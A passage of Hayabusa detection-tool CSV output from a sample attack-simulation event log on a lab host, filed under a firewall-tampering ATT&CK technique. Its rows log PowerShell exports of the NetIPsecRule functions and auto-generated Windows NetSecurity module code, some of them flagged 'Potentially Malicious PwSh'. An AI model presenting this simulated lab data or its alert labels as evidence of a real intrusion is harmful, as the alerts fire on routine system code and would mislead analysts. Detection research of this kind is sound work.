value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.776 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Find-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.776 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.777 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System 
Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.785 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.785 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.786 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.786 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" 
ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.787 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.787 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Sync-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.788 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Update-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] 
${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { 
[object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent 
= $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; 
Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 